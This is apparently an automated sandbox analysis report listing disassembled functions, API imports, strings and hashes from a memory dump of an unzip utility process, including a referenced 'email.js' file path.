Function 0041B130 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

(%ld bytes security), xrefs: 0041B2DF
%, xrefs: 0041B30F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID: (%ld bytes security)$%
API String ID: 0-2962021768
Opcode ID: ce6f86a85e671a42992d28e30576bfce81e9d531fbb5b965728a9bdb75e9176e
Instruction ID: adef0fcb9d24c1b603132db9b617bc35ba20a19de7632127825d4f09c95d0462
Opcode Fuzzy Hash: ce6f86a85e671a42992d28e30576bfce81e9d531fbb5b965728a9bdb75e9176e
Instruction Fuzzy Hash: 235149B06087019BD724DF25D5847AFBBE0EF84344F418C6EE88987350D738D889CB9A

Function 00407888 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 106stringCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 004078B2
sprintf.MSVCRT ref: 00407910

Part of subcall function 0040BB20: _lseeki64.MSVCRT ref: 0040BB75
Part of subcall function 0040BB20: _read.MSVCRT ref: 0040BB9A

strncmp.MSVCRT ref: 004079B5
sprintf.MSVCRT ref: 004079F6

Strings

%, xrefs: 004078CB, 00407929, 00407A0F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$_lseeki64_readstrncmp
String ID: %
API String ID: 2619574356-1230660975
Opcode ID: 9dd453e68493c610bf7c43dd78c7b47bbd34c60a0425a8f8786156fea9753ae8
Instruction ID: 7a710aaa1b73f65ea16f755848096f7a79b78f73b247b1f6bb369cbc8c7092b8
Opcode Fuzzy Hash: 9dd453e68493c610bf7c43dd78c7b47bbd34c60a0425a8f8786156fea9753ae8
Instruction Fuzzy Hash: 2741F5B0A0A7119FC340EF15D44422EBBE0FB84754F90D82EE99467351DBB8A844CF9B

Function 00404640 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_isctype.MSVCRT ref: 00404685
mblen.MSVCRT ref: 0040469D
_isctype.MSVCRT ref: 004046D0
mblen.MSVCRT ref: 004046E8
mblen.MSVCRT ref: 0040475F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: mblen$_isctype
String ID:
API String ID: 4098688932-0
Opcode ID: 1c3a474dbad336138407e9669277b8769e3788bf24767f10b0cad605ffd68227
Instruction ID: 81dc77af3dfd7da31856deb6cda57aa0c8c9bc6e64e8b989bb244f37c76a8573
Opcode Fuzzy Hash: 1c3a474dbad336138407e9669277b8769e3788bf24767f10b0cad605ffd68227
Instruction Fuzzy Hash: CE31DAB56443608FC320CF24E49077677E0ABC2710F48482EDAC22B391E33D5885EB8A

Function 0040F23C Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

mblen.MSVCRT ref: 0040F002
mblen.MSVCRT ref: 0040F05E
tolower.MSVCRT ref: 0040F07D
tolower.MSVCRT ref: 0040F08A
mblen.MSVCRT ref: 0040F1AB
mblen.MSVCRT ref: 0040F1D7
mblen.MSVCRT ref: 0040F1F4
tolower.MSVCRT ref: 0040F22B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: mblen$tolower
String ID:
API String ID: 794965741-0
Opcode ID: 8bb903da01f6c6c31c188013dff985e88fa4e98d401c70e97117a7faf11ffb9a
Instruction ID: 89539277e9e2a29ab843f7524db65006166f1dc5ddaee97d442546c3d837a23d
Opcode Fuzzy Hash: 8bb903da01f6c6c31c188013dff985e88fa4e98d401c70e97117a7faf11ffb9a
Instruction Fuzzy Hash: CF31AF756087128FC730DF21C0C042AB7E0BF98714F61483FE9C567352E6799C499B8A

Function 004081B0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 004081EA

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

sprintf.MSVCRT ref: 00408230

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 004081C3, 00408209
%, xrefs: 00408249
jre/jre-1.8/lib/deploy/email.js, xrefs: 004081CB, 00408211

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$Char
String ID: %$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 4001210701-1688794020
Opcode ID: 83a8caf340c0f6147e824a36ba11c50d9b9ec64848ef4e720c68ab11860dbaee
Instruction ID: 622835a1f0c00d5755dae47904a68c517129e169c42cf4b7a700ced084843f43
Opcode Fuzzy Hash: 83a8caf340c0f6147e824a36ba11c50d9b9ec64848ef4e720c68ab11860dbaee
Instruction Fuzzy Hash: BE317E70A0D3018BD725AF15954422FB7E0EB84344F54843FE584AB392DBBCA885DB9F

Function 00410300 Relevance: 7.6, APIs: 6, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 108ab606a1e9bf522eb0ff9cecd000f071a837b94626340220ebe2b193873557
Instruction ID: b24dc4dd0f71ec667931c8f093c9dc9269da7281cc310c8beb21d90b905afb4b
Opcode Fuzzy Hash: 108ab606a1e9bf522eb0ff9cecd000f071a837b94626340220ebe2b193873557
Instruction Fuzzy Hash: EE219C30B157158BD750AF7AA8842AAB6E4FB50308F81583FE865C7211EBB898C18B4D

Function 00403F30 Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00403F79
malloc.MSVCRT ref: 00403F82
CharToOemA.USER32 ref: 00403F9F
free.MSVCRT ref: 00403FBC

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Charfreemallocstrlen
String ID:
API String ID: 3325112331-0
Opcode ID: fb691eddc3213199cf5ab9dc53fc79b24bb75ca74fa492e4b2cef7d9b2374eb6
Instruction ID: e61d73cae84d5884683b85f76d27387c81d9a9fa071f44dabd3be49a8d66e043
Opcode Fuzzy Hash: fb691eddc3213199cf5ab9dc53fc79b24bb75ca74fa492e4b2cef7d9b2374eb6
Instruction Fuzzy Hash: D8112170A187128BC300FF29958102EBAF4BF88754F81492EF995A7352D7B88D459B9B

Function 0040840C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00408436
sprintf.MSVCRT ref: 00408486
sprintf.MSVCRT ref: 00408504

Strings

x@%, xrefs: 004084CC
%, xrefs: 0040844F, 0040849F

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: %$x@%
API String ID: 590974362-2374428587
Opcode ID: 8f021c8a1b366772fdc6f620174256b46ce60f28c0d087b2afc25c669712299d
Instruction ID: b9323895f96bf98d277838b0c63adf088494206fb945f743251878064d5fd978
Opcode Fuzzy Hash: 8f021c8a1b366772fdc6f620174256b46ce60f28c0d087b2afc25c669712299d
Instruction Fuzzy Hash: 2521D8B190A7219FC3009F15D54821EBBE1BB84754F81D82EE9C56B361DBB8A844CF9A

Function 0041AA10 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 0041AA7B

Strings

updated: %lu directory entries with %lu bytes security, xrefs: 0041AAAB
%, xrefs: 0041AA94, 0041AAD7
failed: %lu directory entries with %lu bytes security, xrefs: 0041AA68

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: failed: %lu directory entries with %lu bytes security$ updated: %lu directory entries with %lu bytes security$%
API String ID: 590974362-2262904193
Opcode ID: f23da72213c3c63a304aec345622b1cfe57e58f5f49b1e862e7715b444e928eb
Instruction ID: fc6f4b539de9d4ba038e30accf39f59076ab539f0d9f00b6583dcf9063ed85ff
Opcode Fuzzy Hash: f23da72213c3c63a304aec345622b1cfe57e58f5f49b1e862e7715b444e928eb
Instruction Fuzzy Hash: B921AFB4A0A7019FC314DF12D15466EBBE1BFD8798F94C91EE48916310EBB88585CF8B

Function 0041FC30 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetShortPathNameA.KERNEL32 ref: 0041FC56
malloc.MSVCRT ref: 0041FC6A
GetShortPathNameA.KERNEL32 ref: 0041FC80
free.MSVCRT ref: 0041FCA5
_errno.MSVCRT ref: 0041FCB7

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: NamePathShort$_errnofreemalloc
String ID:
API String ID: 1314057193-0
Opcode ID: ebbc2697a22742306aab72cc0036c86409cf9c7eac95273352de032e74ef0650
Instruction ID: 747e1b7ac9d9ac0437fa59821c0dbe1b0e8c84fee3b24a630423a01086f1f988
Opcode Fuzzy Hash: ebbc2697a22742306aab72cc0036c86409cf9c7eac95273352de032e74ef0650
Instruction Fuzzy Hash: 9E0140B1A187218BC300EF29C14126ABBE5BFC4744F85496EEC8897311E778D9499BDB

Function 00423410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 004234E0: strlen.MSVCRT ref: 00423537
Part of subcall function 004234E0: sprintf.MSVCRT ref: 00423586

Part of subcall function 00423860: _errno.MSVCRT ref: 00423872
Part of subcall function 00423860: strlen.MSVCRT ref: 00423887
Part of subcall function 00423860: _errno.MSVCRT ref: 004238AD

_fdopen.MSVCRT ref: 00423479
_close.MSVCRT ref: 004234A0

Strings

w+bD, xrefs: 0042346E
tmpf, xrefs: 00423430

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errnostrlen$_close_fdopensprintf
String ID: tmpf$w+bD
API String ID: 2589914342-3802544957
Opcode ID: c9f30562be3e7260eca7f912e450146653b6894b2757e14ca34de26fad5e4ca8
Instruction ID: ca8107b7e89256fd65cd5c1cfd282f20676204c8bdf4bfd119ab6bbebdc1e6b0
Opcode Fuzzy Hash: c9f30562be3e7260eca7f912e450146653b6894b2757e14ca34de26fad5e4ca8
Instruction Fuzzy Hash: 8901FFB07097618BD351EF26D58535BBAF0AF84309F85886EE58887301E77C9645CB86

Function 0042231C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00422273
free.MSVCRT ref: 00422295
_strdup.MSVCRT(?,?,?,?,?,?,004212C3), ref: 00422331
toupper.MSVCRT ref: 0042233E

Strings

:/, xrefs: 0042232A

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _strdupfreestrlentoupper
String ID: :/
API String ID: 3737813196-1232370898
Opcode ID: d87a7071170f8f20ef8db0d914d393b048d624f94cdc6697c3a702e0659509a1
Instruction ID: 8d3b39448ecabb105ff265bac3b5df612823f2dee9be96971aabe57199a602b1
Opcode Fuzzy Hash: d87a7071170f8f20ef8db0d914d393b048d624f94cdc6697c3a702e0659509a1
Instruction Fuzzy Hash: 5FE06D75608B619BC310AF24A04103AFBF0AF94314FD98C8EE8D413302C37DA9448BAB

Function 00411BE0 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 272COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00412007

Strings

V/N/K/X/jre/jre-1.8/lib/deploy/email.js, xrefs: 00411E5B
/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h, xrefs: 00411DBD, 00411DE9, 00411DF9
t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/, xrefs: 00411F05

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: malloc
String ID: /R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h$V/N/K/X/jre/jre-1.8/lib/deploy/email.js$t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/h/d/U/Z/Q/n/I/e/H/B/S/m/v/z/Y/j/w/M/J/u/p/k/g/W/l/O/t/R/a/T/o/P/D/s/b/f/G/q/E/C/y/L/x/c/i/r/A/V/N/K/X/F/
API String ID: 2803490479-346969317
Opcode ID: ff71645b656a7d8e06df325b1fd32e80f9e80f016708beb3f385d0327a4edca0
Instruction ID: dbd8b01e5c25542228dfbbebfdf5387dc894fc2aa768ab06fe958893bfdf8cf6
Opcode Fuzzy Hash: ff71645b656a7d8e06df325b1fd32e80f9e80f016708beb3f385d0327a4edca0
Instruction Fuzzy Hash: 52B1A2706057018BC314DF19E9802A6BBF2F7A4300F14A53FEA45473A6DF38A986DB9D

Function 00416EE0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 167stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00416F24

Strings

b, xrefs: 00417777
%03u, xrefs: 004178EB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: strcpy
String ID: %03u$b
API String ID: 3177657795-2775748998
Opcode ID: bcf3a717bc301f363a85ca44263cb4c21e5777434100895e9185e1ec910d5b4c
Instruction ID: a93d8248b8708216a2a5a8b3990a596ff5238be8b0cff081af6e9ac705eacc72
Opcode Fuzzy Hash: bcf3a717bc301f363a85ca44263cb4c21e5777434100895e9185e1ec910d5b4c
Instruction Fuzzy Hash: 3951C77450D7808ADB314A18D4843EB6BF1AB63350F24591BE5E04B3C2C66E88C6E76F

Function 004145A9 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 121stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 00414668
malloc.MSVCRT ref: 00414C79

Strings

%, xrefs: 004147FD
Central directory entry #%lu:---------------------------, xrefs: 004147D5

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: mallocstrncmp
String ID: Central directory entry #%lu:---------------------------$%
API String ID: 1726509752-2893065250
Opcode ID: c9927a479042413e40cf4251951a7a615f38f465bb1283f241ea25fed0752ae5
Instruction ID: af030ac214d05b3377e7a2cdb7cfa5c89ababea2c64a3432de91f924055164c6
Opcode Fuzzy Hash: c9927a479042413e40cf4251951a7a615f38f465bb1283f241ea25fed0752ae5
Instruction Fuzzy Hash: C241B27460A3518BD750AF25D5403ABBBE0BBC1358F50883EE88497390EB7CD885CB4E

Function 0041C729 Relevance: 6.1, APIs: 4, Instructions: 88fileCOMMON

Download Yara Rule

APIs

GetSecurityDescriptorControl.ADVAPI32 ref: 0041C743
CreateFileA.KERNEL32 ref: 0041C829
SetKernelObjectSecurity.ADVAPI32 ref: 0041C84D
CloseHandle.KERNEL32 ref: 0041C85A

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Security$CloseControlCreateDescriptorFileHandleKernelObject
String ID:
API String ID: 175718715-0
Opcode ID: ae1b9430b68665005f3a1f15258d32660660378762a29b9174a6915f52c082d0
Instruction ID: 858598dc66c2f0d5b18129cd344cb48010001c4c2ef55cbae8851eeafa61da48
Opcode Fuzzy Hash: ae1b9430b68665005f3a1f15258d32660660378762a29b9174a6915f52c082d0
Instruction Fuzzy Hash: 6E314A756483028BD714DF25C58475BBBE1BFC4758F148A1EE89867390C3B8E985CF8A

Function 0040972C Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 87COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00409816
memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000,?,00409A48), ref: 0040997B

Strings

%, xrefs: 0040982F
not enough memory to , xrefs: 004097F7
invalid compressed data to , xrefs: 004097FE

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: memcpysprintf
String ID: %$invalid compressed data to $not enough memory to
API String ID: 2854459516-656867265
Opcode ID: 8bba636fa0326b9d4ee936575815b7e5143876a140cb72c570853080d77f7158
Instruction ID: d8f2cb452e572988372a08a7b09767e1416af5961ba411f3960c6ccd32988042
Opcode Fuzzy Hash: 8bba636fa0326b9d4ee936575815b7e5143876a140cb72c570853080d77f7158
Instruction Fuzzy Hash: 8C3159B69093108FC750DF2AE48014AFBF0FB98344F41983EE988A7391DB789845CF99

Function 00421E79 Relevance: 6.1, APIs: 4, Instructions: 62fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00421ECC
DeviceIoControl.KERNEL32 ref: 00421F36
CloseHandle.KERNEL32 ref: 00421F43
_errno.MSVCRT ref: 00421F5D

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceFileHandle_errno
String ID:
API String ID: 43811222-0
Opcode ID: bf1134622f18351e5f48e5f8159ec9955032eae5871718f5977efb60f04c9dbb
Instruction ID: 26a1dfdef2bcc8dcb37134c930035ca5e6ae40fd80a7c5ef37cb289f7403abef
Opcode Fuzzy Hash: bf1134622f18351e5f48e5f8159ec9955032eae5871718f5977efb60f04c9dbb
Instruction Fuzzy Hash: 3221E5B05083409FD310EF29D18471BBAE1AFC4358F558A2EF8A947361D779D9498B87

Function 00401180 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 004011CD
signal.MSVCRT ref: 00401208
signal.MSVCRT ref: 00401224

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
